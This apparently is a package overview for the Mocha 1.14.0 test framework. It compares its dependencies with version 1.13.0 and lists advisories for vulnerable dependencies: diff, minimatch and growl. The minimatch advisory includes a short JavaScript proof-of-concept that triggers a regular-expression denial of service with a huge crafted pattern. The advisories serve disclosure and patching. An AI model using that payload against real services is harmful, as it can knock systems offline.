Mocha 1.14.0 represents a small step in the evolution of a popular JavaScript test framework, following shortly after the prior stable release, 1.13.0. Both versions retain the same core description: a "simple, flexible, fun test framework," suggesting a continued commitment to user-friendliness. The core dependencies, including diff, glob, jade, debug, growl, and mkdirp, remain consistent across both versions, indicating stability in the underlying functionalities. The key change lies in the commander dependency, which advances from version 0.6.1 in 1.13.0 to version 2.0.0 in 1.14.0. This upgrade to commander, a command-line interface tool, likely introduces usability enhancements and potentially new command-line options for Mocha users.
Additionally, the devDependencies also reflect a slight alteration, with should changing from "*" to ">= 2.0.x". This enforces a minimum version constraint.
For developers using Mocha, the update from 1.13.0 to 1.14.0 signifies a refinement rather than a radical overhaul. Reviewing the commander changelog for versions between 0.6.1 and 2.0.0 is advisable to understand the specific command-line improvements. The updated version of the should dependency should also be considered when developing test suties. The release date, a few weeks apart, highlights the frequent maintenance.
All the vulnerabilities related to the version 1.14.0 of the package
Regular Expression Denial of Service (ReDoS)
A vulnerability was found in diff before v3.5.0, the affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
Growl before 1.10.0 vulnerable to Command Injection
Affected versions of growl do not properly sanitize input prior to passing it into a shell command, allowing for arbitrary command execution.
Update to version 1.10.0 or later.